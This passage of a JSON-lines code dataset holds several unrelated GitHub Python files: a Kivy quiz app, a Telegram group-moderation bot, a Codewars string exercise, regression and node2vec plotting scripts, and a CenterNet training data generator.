i.icon_record\n\t\t\t\t\t\t\ti.icon_color = (.5, .5, .5, 1)\n\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\treturn False\n\t\texcept AttributeError:\n\t\t\ttoast('Нажмите значок выхода',\n\t\t\t\t\tTrue, 80, 500, 0)\n\n\n\n\n\nclass Creator(MDScreen):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\t\tself.count = 1\n\t\tcount=self.count\n\t\tself.ids.q.helper_text = f'Вопрос № {self.count}'\n\t\tself.ids.save.disabled = True\n\t\tself.list_of_questions = []\n\t\tself.list_of_answers = []\n\n\tdef counter(self):\n\t\tself.count += 1\n\t\tself.ids.q.helper_text = f'Вопрос № {self.count}'\n\t\tif self.count>10:\n\t\t\tself.ids.save.disabled = False\n\t\tself.list_of_questions.append(self.ids.q.text)\n\t\tself.list_of_answers.append(self.ids.a.text)\n\t\tself.ids.q.text = ''\n\t\tself.ids.a.text = ''\n\n\tdef zero_counter(self):\n\t\tself.count = 1\n\t\tself.ids.q.helper_text = f'Вопрос № {self.count}'\n\t\tself.ids.save.disabled = True\n\t\tself.ids.n.text = ''\n\n\tdef save_list(self):\n\t\tif self.ids.n.text not in ('', ' '):\n\t\t\tname=self.ids.n.text\n\t\t\tf=open(f'/storage/emulated/0/Zybrila/{name}.zybr', 'w')\n\t\t\tf.write('# questions'+'\\n')\n\t\t\tf.close()\n\t\t\twith open(f'/storage/emulated/0/Zybrila/{name}.zybr', 'a') as f:\n\t\t\t\tfor i in range(len(self.list_of_questions)):\n\t\t\t\t\tf.write(str(self.list_of_questions[i])+'\\n')\n\n\t\t\twith open(f'/storage/emulated/0/Zybrila/{name}.zybr', 'a') as f:\n\t\t\t\tf.write('\\n# true_answers'+'\\n')\n\t\t\t\tfor i in range(len(self.list_of_answers)):\n\t\t\t\t\tf.write(str(self.list_of_answers[i])+'\\n')\n\t\t\tself.manager.current = '1'\n\t\t\tself.zero_counter()\n\t\telse:\n\t\t\tself.warning=MDDialog(\n\t\t\t\ttitle='Внимание!',\n\t\t\t\tauto_dismiss=False,\n\t\t\t\ttype='alert',\n\t\t\t\ttext='Заполните поле \"Название\", что бы создать тест.',\n\t\t\t\tbuttons=[MDFlatButton(\n\t\t\t\t\ttext='Ладно',\n\t\t\t\t\ton_press=self.dialod_dismiss)])\n\t\t\tself.warning.open()\n\n\tdef dialod_dismiss(self, args):\n\t\tself.warning.dismiss()\n\t\tClock.schedule_once(self.focus_name, .2)\n\tdef focus_name(self, args):\n\t\tself.ids.n.focus = True\n\n\n\n\n\nclass MyApp(MDApp):\n\tdef build(self):\n\t\tWindow.bind(\n\t\t\ton_keyboard=self.key_input)\n\t\t#return Enter()\n\t\tself.sm = ScreenManager()\n\t\tself.sm.add_widget(Enter(name='1'))\n\t\tself.sm.add_widget(Creator(name='2'))\n\t\t#self.sm.current = '2'\n\t\treturn self.sm\n\t\t\n\tdef on_start_(self):\n\t\tself.fps_monitor_start()\n\t\t\n\tdef key_input(self, window,\n\t\t\t\t\t\t\tkey, scancode,\n\t\t\t\t\t\t\tcodepoint, modifier):\n\t\tif key == 27:\n\t\t\t#toast('Нажмите ещё раз для выхода', True, 80, 500, 0)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef on_pause(self):\n\t\ttoast('Приложение приостановлено',\n\t\t\t\tTrue, 80, 500, 0)\n\t\treturn True\n\t\n\tdef on_resume(self):\n\t\ttoast('Приложение работает',\n\t\t\t\tTrue, 80, 500, 0)\n\t\treturn True\n\t\t\nif __name__ == '__main__':\n\tMyApp().run()","repo_name":"Chypatan/Zybrila","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14003,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5292375364","text":"from DionRobot import dion\nfrom DionRobot.status import *\n\nfrom telethon import events, Button, types\nfrom telethon.tl.functions.channels import EditAdminRequest, EditBannedRequest\nfrom telethon.tl.types import ChatAdminRights, ChatBannedRights\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon.tl.functions.messages import ExportChatInviteRequest\n\n\nADMIN_TEXT = \"\"\"\n**✘ A module from which admins of the chat can use!**\n‣ `/ban` - To ban a user in the chat.\n‣ `/kick` - To kick a user in the chat.\n‣ `/pin` - To pinned a reply msg.\n‣ `/unpin` - To Unpin the latest pinned msg.\n‣ `/unpinall` - To unpinall all pinned message at once.\n‣ `/pinned` - To get current pinned msg.\n‣ `/promote` - To Promote a user in the chat.\n‣ `/demote` - To Demote a user in the chat.\n‣ `/invitelink` - To get invitelink of a chat.\n\"\"\"\n\n@dion.on(events.callbackquery.CallbackQuery(data=\"admin\"))\nasync def _(event):\n await event.edit(ADMIN_TEXT, buttons=[[Button.inline(\"« Bᴀ��ᴋ\", data=\"help\")]])\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]promote ?(.*)\"))\n@is_admin\nasync def promote(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups, not in PM!\")\n return\n\n if not perm.add_admins:\n await event.reply(\"You are missing the following rights to use this command:__Can Add Admins!__\")\n return\n input_str = event.pattern_match.group(1)\n user = await event.get_reply_message()\n if not input_str and not user:\n await event.reply(\"Reply to a user or give its username to promote him!\")\n return\n sed = await dion(GetFullUserRequest(id=user.sender_id or input_str))\n await dion(EditAdminRequest(event.chat_id, user.sender_id or input_str, ChatAdminRights(\n add_admins=False,\n invite_users=True,\n change_info=False,\n ban_users=True,\n delete_messages=True,\n pin_messages=True), rank=\"Admin\"))\n\n if not input_str:\n await event.reply(f\"Successfully Promoted [{sed.user.first_name}](tg://user?id={user.sender_id}) in {event.chat.title}!\")\n return\n\n await event.reply(f\"Succesfully Promoted {input_str} in {event.chat.title}\")\n \n\n@dion.on(events.NewMessage(pattern=\"^[!?/]demote ?(.*)\"))\n@is_admin\nasync def demote(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups, not in PM!\")\n return\n if not perm.add_admins:\n await event.reply(\"You are missing the following rights to use this command:__Can Add Admins!__\")\n return\n input_str = event.pattern_match.group(1)\n user = await event.get_reply_message()\n if not input_str and not user:\n await event.reply(\"Reply to a user or give its username to demote him!\")\n return\n sed = await dion(GetFullUserRequest(id=user.sender_id or input_str))\n await dion(EditAdminRequest(event.chat_id, user.sender_id or input_str, ChatAdminRights(\n add_admins=False,\n invite_users=None,\n change_info=None,\n ban_users=None,\n delete_messages=None,\n pin_messages=None), rank=\"Not Admin\"))\n\n if not input_str:\n await event.reply(f\"Successfully Demoted [{sed.user.first_name}](tg://user?id={user.sender_id}) in {event.chat.title}!\")\n return\n\n await event.reply(f\"Succesfully Demoted {input_str} in {event.chat.title}\")\n \n\n@dion.on(events.NewMessage(pattern=\"^[!?/]kick ?(.*)\"))\n@is_admin\nasync def kick(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups not PM\")\n return\n if not perm.ban_users:\n await event.reply(\"You are missing the following rights to use this command:__Can Ban Users!__\")\n return\n input_str = event.pattern_match.group(1)\n msg = await event.get_reply_message()\n if not input_str and not msg:\n await event.reply(\"Reply to a user or give its username to kick him\")\n return\n\n replied_user = msg.sender_id\n us = msg.sender.username\n info = await dion.get_entity(us)\n await dion.kick_participant(event.chat_id, input_str or replied_user)\n await event.reply(f\"Succesfully Kicked [{info.first_name}](tg://user?id={replied_user}) from {event.chat.title}\")\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]ban ?(.*)\"))\n@is_admin\nasync def ban(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups not PM\")\n return\n if not perm.ban_users:\n await event.reply(\"You are missing the following rights to use this command:__Can Ban Users!__\")\n return\n input_str = event.pattern_match.group(1)\n msg = await event.get_reply_message()\n if not input_str and not msg:\n await event.reply(\"Reply to a user or give its username to ban him\")\n return\n replied_user = msg.sender_id\n us = msg.sender.username\n info = await dion.get_entity(us)\n await dion(EditBannedRequest(event.chat_id, replied_user, ChatBannedRights(until_date=None, view_messages=True)))\n await event.reply(f\"Succesfully Banned [{info.first_name}](tg://user?id={replied_user}) in {event.chat.title}\")\n\n\n@dion.on(events.NewMessage(pattern=\"^[?!/]pinned\"))\nasync def get_pinned(event):\n chat_id = (str(event.chat_id)).replace(\"-100\", \"\")\n\n Ok = await dion.get_messages(event.chat_id, ids=types.InputMessagePinned()) \n tem = f\"The pinned message in {event.chat.title} is here.\"\n await event.reply(tem, parse_mode=\"html\", link_preview=False)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]pin ?(.*)\"))\n@is_admin\nasync def pin(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message__.\")\n return\n msg = await event.get_reply_message()\n if not msg:\n await event.reply(\"Reply to a msg to pin it!\")\n return\n input_str = event.pattern_match.group(1)\n if \"notify\" in input_str:\n await dion.pin_message(event.chat_id, msg, notify=True)\n return\n await dion.pin_message(event.chat_id, msg)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]unpin ?(.*)\"))\n@is_admin\nasync def unpin(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message__.\")\n return\n chat_id = (str(event.chat_id)).replace(\"-100\", \"\")\n ok = await dion.get_messages(event.chat_id, ids=types.InputMessagePinned())\n await dion.unpin_message(event.chat_id, ok)\n await event.reply(f\"Successfully unpinned [this](t.me/{event.chat.username}/{ok.id}) message.\", link_preview=False)\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]permapin\"))\n@is_admin\nasync def permapin(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message.__\")\n return\n msg = await event.get_reply_message()\n if not msg:\n await event.reply(\"Reply to a msg to permapin it.\")\n return\n hn = await dion.send_message(event.chat_id, msg.message)\n await dion.pin_message(event.chat_id, hn, notify=True)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]unpinall\"))\nasync def unpinall(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message!__\")\n return\n UNPINALL_TEXT = \"\"\"\nAre you sure you want to unpin all message?\nThis action can't be undone!\n\"\"\"\n\n await dion.send_message(event.chat_id, UNPINALL_TEXT, buttons=[\n [Button.inline(\"Confirm\", data=\"unpin\")], \n [Button.inline(\"Cancel\", data=\"cancel\")]])\n\n@dion.on(events.callbackquery.CallbackQuery(data=\"unpin\"))\nasync def confirm(event):\n check = await event.client.get_permissions(event.chat_id, event.sender_id)\n if check.is_creator:\n await dion.unpin_message(event.chat_id)\n await event.edit(\"Unpinned All Message!\")\n return \n\n await event.answer(\"You are missing the following rights to use this command: Can Pin Message!\", alert=True)\n\n@dion.on(events.callbackquery.CallbackQuery(data=\"cancel\"))\nasync def cancel(event):\n\n check = await event.client.get_permissions(event.chat_id, event.sender_id)\n if check.is_creator:\n await event.edit(\"Unpinning of all messags has been cancelled!\")\n return \n\n await event.answer(\"You are missing the following rights to use this command: Can Pin Message!\", alert=True)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]invitelink\"))\nasync def invitelink(event):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups, not in PM!\")\n return\n link = await dion(ExportChatInviteRequest(event.chat_id))\n await event.reply(f\"Group link of {event.chat.title} is [here]({link.link})\", link_preview=False)\n","repo_name":"SeorangDion/DionBot","sub_path":"DionRobot/modules/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":9003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"70573027772","text":"\"\"\"\nCodewars:\n\nComplete the method/function so that it converts dash/underscore delimited words into camel casing.\nThe first word within the output should be capitalized only if the original word was\ncapitalized (known as Upper Camel Case, also often referred to as Pascal case).\n\nExamples\n\"the-stealth-warrior\" gets converted to \"theStealthWarrior\"\n\"The_Stealth_Warrior\" gets converted to \"TheStealthWarrior\"\n\"\"\"\n\n\ndef to_camel_case(text: str):\n import re\n # Делим входящую строку \"text\" по соответствующим симолам из класса, указанного в кавычках []\n words_list = re.split('[-_ .]', text)\n\n # Если строка не пустая, выполняем алгоритм\n if text.strip():\n new_words_list = []\n for word in words_list:\n title_word = word[0].upper() + word[1:].lower()\n new_words_list.append(title_word)\n if new_words_list[0][0] != words_list[0][0]:\n first_elem = new_words_list[0][0].lower() + new_words_list[0][1:]\n new_words_list[0] = first_elem\n return \"\".join(new_words_list)\n\n # В случае передачи пустой строки или строки с пробелами возвращаем пустую строку\n else:\n return \"\".join(words_list)\n\n\nprint(to_camel_case('The-Pippi_Is_kawaii'))\nprint(to_camel_case('A_pippi-was-Pippi'))\nprint(to_camel_case('A-Lenn_is.ill'))\nprint(to_camel_case('The-Lenn_is.ill'))\nprint(to_camel_case('A-B_C-D G.k'))\n","repo_name":"avborisov86/qa_textbook_vs_codewars_python","sub_path":"cw_to_camel_case.py","file_name":"cw_to_camel_case.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18112934057","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 14 16:09:35 2018\n\n@author: raghup\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\ndf = pd.read_csv('50_Startups.csv')\n\ndf.head()\ndesc = df.describe()\n\nfor i in desc.columns:\n if desc[i]['std'] == 0:\n df = df.drop(i,axis=1)\ndf.columns\nunique_states = list(df['State'].unique())\n\nX = df.iloc[:,:-1].values\nY = df.iloc[:,-1].values\n\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder = LabelEncoder()\nX[:, 3] = labelencoder.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX= onehotencoder.fit_transform(X).toarray()\n\nX = X[:, 1:]\n\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2, random_state = 0)\n\nx1 = X_train[:]\nfrom sklearn.preprocessing import MinMaxScaler\nsc_X = MinMaxScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\n\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n\ny_pred = regressor.predict(X_test)\n\n\nimport matplotlib.pyplot as plt\nplt.plot(range(len(y_pred)),y_pred,color='red',label = 'predicted')\nplt.scatter(range(len(y_test)),y_test,color='blue',label = 'original')\nplt.legend(loc='upper right')\n#plt.savefig('Multiple Linear Regression')\nplt.show()\nplt.close()","repo_name":"Raghu7845/100-days-of-ml-challange","sub_path":"Multiple Linear Regression/MultiLinearReg.py","file_name":"MultiLinearReg.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16596320264","text":"import psutil\nimport time\nimport module\nimport socket\n\nclass Host(module.BaseModule):\n\n \"\"\"\n * {{addr(family)}} - get address for the given address family \n (one of ip, ip6, link)\n * {{ip}} - get IPv4 address \n \"\"\"\n\n def __init__(self, ttl=300): \n self.interfaces = None\n self.ttl = ttl\n\n def keys(self):\n return [\"addr\", \"ip\"]\n\n def get(self, key): \n def addr(device, address_family):\n if address_family == \"ip\":\n af = socket.AF_INET\n elif address_family == \"ip6\":\n af = socket.AF_INET6\n elif address_family == \"link\":\n af = psutil.AF_LINK\n else:\n raise ValueError(\"Unsupported address family: %s\" % address_family)\n \n curtime = time.time()\n if self.interfaces is None or curtime - self.last_query > self.ttl:\n self.interfaces = psutil.net_if_addrs()\n self.last_query = curtime\n\n for addr in self.interfaces[device]:\n if addr.family == af:\n return addr.address\n\n raise ValueError(\"Device %s doesn't have address of the address family %s\" % (device, address_family))\n def ip(device):\n return addr(device, \"ip\")\n if key == \"addr\":\n return addr\n if key == \"ip\": \n return ip\n else:\n raise KeyError()","repo_name":"thingswise/tw-etcdstat","sub_path":"etcdstat/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37507605541","text":"from model.contact import Contact\nimport random\n\n\ndef test_contact_edit_all_fields(app, db, json_contacts, check_ui):\n contact_data = json_contacts\n app.contact.check(db, Contact(firstname=\"\", middlename=\"\", lastname=\"\", nickname=\"\", title=\"\", company=\"\",\n address=\"\", home=\"\", mobile=\"\", work=\"\", fax=\"\", email1=\"\", email2=\"\", email3=\"\",\n homepage=\"\", bday=\"\", bmonth=\"-\", byear=\"\", aday=\"\", amonth=\"-\", ayear=\"\", address2=\"\",\n phone2=\"\", notes=\"\"))\n old_contacts = db.get_contact_list()\n contact = random.choice(old_contacts)\n contact_data.id = contact.id\n app.contact.edit_contact_by_id(contact.id, contact_data)\n new_contacts = db.get_contact_list()\n old_contacts.remove(contact)\n old_contacts.append(contact_data)\n assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)\n # опциональная проверка, если при запуске указан check_ui\n app.contact.ui_check(db, check_ui)","repo_name":"voronova-ea/python_training","sub_path":"test/test_edit_contact.py","file_name":"test_edit_contact.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70825109053","text":"from gensim.models import Word2Vec\nimport argparse\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\ndef load__match_dict(n2v_match_dict_dir):\n with open(n2v_match_dict_dir, 'rb') as f:\n loaded_dict = pickle.load(f)\n return loaded_dict\n\ndef plot_embedding_viz(node_embeddings_2d, labels, save_path, args):\n node_emb_2d_pos = []\n node_emb_2d_neg = []\n for i in range(len(labels)):\n if labels[i] == 1:\n node_emb_2d_pos.append(node_embeddings_2d[i, :])\n else:\n node_emb_2d_neg.append(node_embeddings_2d[i, :])\n\n\n plt.figure(figsize=(10, 8))\n plt.scatter(\n np.array(node_emb_2d_neg)[:, 0],\n np.array(node_emb_2d_neg)[:, 1],\n c = \"#a8cce4\",\n s = 6,\n alpha = 0.5,\n )\n plt.scatter(\n np.array(node_emb_2d_pos)[:, 0],\n np.array(node_emb_2d_pos)[:, 1],\n c = \"#fc6b03\",\n s = 6,\n alpha = 0.6,\n )\n plt.xlabel('{}-1'.format(args.dim_reduce_way))\n plt.ylabel('{}-2'.format(args.dim_reduce_way))\n plt.title('{reduce_way} of {gene_subset} dim_{dim} walk_len_{len} num_walks_{num}'.format(reduce_way = args.dim_reduce_way, gene_subset = args.gene_subset, dim=args.dim, len=args.walk_len, num=args.num_walks))\n plt.savefig(save_path + '/embedding_viz_{gene_subset}_{reduce}_{dim}_{walk_len}_{num_walk}.png'.format(gene_subset=args.gene_subset, reduce=args.dim_reduce_way, dim=args.dim, walk_len=args.walk_len, num_walk=args.num_walks))\n \n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--n2v_model_emb_dir\",\n default=None,\n type=str,\n required=True,\n help=\"ph.\",\n )\n\n parser.add_argument(\n \"--cancer_gene_data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"Path where the cancer data are saved.\",\n )\n\n parser.add_argument(\n \"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"Path where the output files are saved.\",\n )\n\n parser.add_argument(\n \"--gene_subset\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--dim_reduce_way\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--dim\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--walk_len\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--num_walks\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n\n args = parser.parse_args() \n with open(\"/.mounts/labs/reimandlab/private/users/gli/BCB430/codes/new_implementation_n2v/all_interaction/graph_and_match_dict/match_dict_all.pkl\", 'rb') as f:\n match_dict = pickle.load(f)\n \n with open(\"/.mounts/labs/reimandlab/private/users/gli/BCB430/codes/new_implementation_n2v/all_interaction/graph_and_match_dict/match_dict_all_int_ensembl.pkl\", 'rb') as f2:\n match_dict_int_ensembl = pickle.load(f2)\n \n with open(\"/.mounts/labs/reimandlab/private/users/gli/BCB430/codes/new_implementation_n2v/all_interaction/node_embeddings_original/node_embeddgins_origin.emb\", \"r\") as f3:\n node_names = []\n rows = f3.readlines()\n for row in rows[1:]:\n node_name = row.strip().split(\" \")[0]\n node_names.append(node_name)\n node_names_vector = np.array(node_names)\n \n node_embeddings_2d = np.load(args.n2v_model_emb_dir + \"/{reduce}_2d_emb_{dim}_{walk_len}_{num_walk}.npy\".format(reduce=args.dim_reduce_way, dim=args.dim, walk_len=args.walk_len, num_walk=args.num_walks))\n if args.gene_subset == \"all\":\n with open(args.cancer_gene_data_dir) as f1:\n lines = f1.readlines()\n all_genes_from_msigDB = []\n for line in lines:\n pos_genes = line.split('\\t')[2:]\n for each_gene in pos_genes:\n if each_gene in match_dict:\n all_genes_from_msigDB.append(match_dict[each_gene][0])\n\n node_names = node_names_vector # one-to-one match\n labels_for_viz_binary = []\n for node in node_names:\n node_key = list(match_dict_int_ensembl.keys())[list(match_dict_int_ensembl.values()).index(node)]\n if node_key in all_genes_from_msigDB:\n labels_for_viz_binary.append(1)\n else:\n labels_for_viz_binary.append(0)\n\n else:\n with open(args.cancer_gene_data_dir) as f1:\n lines = f1.readlines()\n msigDB_dict = {}\n for line in lines:\n msigDB_dict[line.split('\\t')[0]] = []\n pos_genes = line.split('\\t')[2:]\n for each_gene in pos_genes:\n if each_gene in match_dict:\n msigDB_dict[line.split('\\t')[0]].append(match_dict[each_gene][0])\n\n node_names = node_names_vector # one-to-one match\n labels_for_viz_binary = []\n\n for node in node_names:\n node_key = list(match_dict_int_ensembl.keys())[list(match_dict_int_ensembl.values()).index(node)]\n if node_key in msigDB_dict[args.gene_subset]:\n labels_for_viz_binary.append(1)\n else:\n labels_for_viz_binary.append(0)\n \n \n plot_embedding_viz(node_embeddings_2d, labels_for_viz_binary, args.output_dir, args)\n \nif __name__ == \"__main__\":\n main()","repo_name":"reimandlab/PPI_network_based_gene_type_prediction_model","sub_path":"src/005_plot_emb_viz.py","file_name":"005_plot_emb_viz.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2864034218","text":"from PIL import Image\nfrom random import shuffle\nfrom matplotlib.colors import rgb_to_hsv, hsv_to_rgb\nfrom utils.utils import gaussian_radius, draw_gaussian\nimport numpy as np\nimport math\nimport cv2\nimport tensorflow as tf\nimport keras.backend as K\n\ndef preprocess_image(image):\n mean = [0.40789655, 0.44719303, 0.47026116]\n std = [0.2886383, 0.27408165, 0.27809834]\n return ((np.float32(image) / 255.) - mean) / std\n \ndef focal_loss(hm_pred, hm_true):\n # 找到正样本和负样本\n pos_mask = tf.cast(tf.equal(hm_true, 1), tf.float32)\n # 小于1的都是负样本\n neg_mask = tf.cast(tf.less(hm_true, 1), tf.float32)\n neg_weights = tf.pow(1 - hm_true, 4)\n\n pos_loss = -tf.log(tf.clip_by_value(hm_pred, 1e-6, 1.)) * tf.pow(1 - hm_pred, 2) * pos_mask\n neg_loss = -tf.log(tf.clip_by_value(1 - hm_pred, 1e-6, 1.)) * tf.pow(hm_pred, 2) * neg_weights * neg_mask\n\n num_pos = tf.reduce_sum(pos_mask)\n pos_loss = tf.reduce_sum(pos_loss)\n neg_loss = tf.reduce_sum(neg_loss)\n\n cls_loss = tf.cond(tf.greater(num_pos, 0), lambda: (pos_loss + neg_loss) / num_pos, lambda: neg_loss)\n return cls_loss\n\n\ndef reg_l1_loss(y_pred, y_true, indices, mask):\n b, c = tf.shape(y_pred)[0], tf.shape(y_pred)[-1]\n k = tf.shape(indices)[1]\n\n y_pred = tf.reshape(y_pred, (b, -1, c))\n length = tf.shape(y_pred)[1]\n indices = tf.cast(indices, tf.int32)\n\n # 找到其在1维上的索引\n batch_idx = tf.expand_dims(tf.range(0, b), 1)\n batch_idx = tf.tile(batch_idx, (1, k))\n full_indices = (tf.reshape(batch_idx, [-1]) * tf.to_int32(length) +\n tf.reshape(indices, [-1]))\n # 取出对应的预测值\n y_pred = tf.gather(tf.reshape(y_pred, [-1,c]),full_indices)\n y_pred = tf.reshape(y_pred, [b, -1, c])\n\n mask = tf.tile(tf.expand_dims(mask, axis=-1), (1, 1, 2))\n # 求取l1损失值\n total_loss = tf.reduce_sum(tf.abs(y_true * mask - y_pred * mask))\n reg_loss = total_loss / (tf.reduce_sum(mask) + 1e-4)\n return reg_loss\n\n\ndef loss(args):\n #-----------------------------------------------------------------------------------------------------------------#\n # hm_pred:热力图的预测值 (self.batch_size, self.output_size[0], self.output_size[1], self.num_classes)\n # wh_pred:宽高的预测值 (self.batch_size, self.output_size[0], self.output_size[1], 2)\n # reg_pred:中心坐标偏移预测值 (self.batch_size, self.output_size[0], self.output_size[1], 2)\n # hm_true:热力图的真实值 (self.batch_size, self.output_size[0], self.output_size[1], self.num_classes)\n # wh_true:宽高的真实值 (self.batch_size, self.max_objects, 2)\n # reg_true:中心坐标偏移真实值 (self.batch_size, self.max_objects, 2)\n # reg_mask:真实值的mask (self.batch_size, self.max_objects)\n # indices:真实值对应的坐标 (self.batch_size, self.max_objects)\n #-----------------------------------------------------------------------------------------------------------------#\n hm_pred, wh_pred, reg_pred, hm_true, wh_true, reg_true, reg_mask, indices = args\n hm_loss = focal_loss(hm_pred, hm_true)\n wh_loss = 0.1 * reg_l1_loss(wh_pred, wh_true, indices, reg_mask)\n reg_loss = reg_l1_loss(reg_pred, reg_true, indices, reg_mask)\n total_loss = hm_loss + wh_loss + reg_loss\n # total_loss = tf.Print(total_loss,[hm_loss,wh_loss,reg_loss])\n return total_loss\n\ndef rand(a=0, b=1):\n return np.random.rand()*(b-a) + a\n\nclass Generator(object):\n def __init__(self,batch_size,train_lines,val_lines,\n input_size,num_classes,max_objects=100):\n \n self.batch_size = batch_size\n self.train_lines = train_lines\n self.val_lines = val_lines\n self.input_size = input_size\n self.output_size = (int(input_size[0]/4) , int(input_size[1]/4))\n self.num_classes = num_classes\n self.max_objects = max_objects\n \n def get_random_data(self, annotation_line, input_shape, random=True, jitter=.3, hue=.1, sat=1.5, val=1.5, proc_img=True):\n '''r实时数据增强的随机预处理'''\n line = annotation_line.split()\n image = Image.open(line[0])\n iw, ih = image.size\n h, w = input_shape\n box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])\n\n # resize image\n new_ar = w/h * rand(1-jitter,1+jitter)/rand(1-jitter,1+jitter)\n scale = rand(0.25, 2)\n if new_ar < 1:\n nh = int(scale*h)\n nw = int(nh*new_ar)\n else:\n nw = int(scale*w)\n nh = int(nw/new_ar)\n image = image.resize((nw,nh), Image.BICUBIC)\n\n # place image\n dx = int(rand(0, w-nw))\n dy = int(rand(0, h-nh))\n new_image = Image.new('RGB', (w,h), (128,128,128))\n new_image.paste(image, (dx, dy))\n image = new_image\n\n # flip image or not\n flip = rand()<.5\n if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)\n\n # distort image\n hue = rand(-hue, hue)\n sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)\n val = rand(1, val) if rand()<.5 else 1/rand(1, val)\n x = cv2.cvtColor(np.array(image,np.float32)/255, cv2.COLOR_RGB2HSV)\n x[..., 0] += hue*360\n x[..., 0][x[..., 0]>1] -= 1\n x[..., 0][x[..., 0]<0] += 1\n x[..., 1] *= sat\n x[..., 2] *= val\n x[x[:,:, 0]>360, 0] = 360\n x[:, :, 1:][x[:, :, 1:]>1] = 1\n x[x<0] = 0\n image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB)*255\n\n\n # correct boxes\n box_data = np.zeros((len(box),5))\n if len(box)>0:\n np.random.shuffle(box)\n box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx\n box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy\n if flip: box[:, [0,2]] = w - box[:, [2,0]]\n box[:, 0:2][box[:, 0:2]<0] = 0\n box[:, 2][box[:, 2]>w] = w\n box[:, 3][box[:, 3]>h] = h\n box_w = box[:, 2] - box[:, 0]\n box_h = box[:, 3] - box[:, 1]\n box = box[np.logical_and(box_w>1, box_h>1)] # discard invalid box\n box_data = np.zeros((len(box),5))\n box_data[:len(box)] = box\n if len(box) == 0:\n return image_data, []\n\n if (box_data[:,:4]>0).any():\n return image_data, box_data\n else:\n return image_data, []\n\n def generate(self, train=True):\n while True:\n if train:\n # 打乱\n shuffle(self.train_lines)\n lines = self.train_lines\n else:\n shuffle(self.val_lines)\n lines = self.val_lines\n \n batch_images = np.zeros((self.batch_size, self.input_size[0], self.input_size[1], self.input_size[2]), dtype=np.float32)\n batch_hms = np.zeros((self.batch_size, self.output_size[0], self.output_size[1], self.num_classes), dtype=np.float32)\n batch_whs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_regs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_reg_masks = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n batch_indices = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n \n b = 0\n for annotation_line in lines: \n img,y=self.get_random_data(annotation_line,self.input_size[0:2])\n\n if len(y)!=0:\n boxes = np.array(y[:,:4],dtype=np.float32)\n boxes[:,0] = boxes[:,0]/self.input_size[1]*self.output_size[1]\n boxes[:,1] = 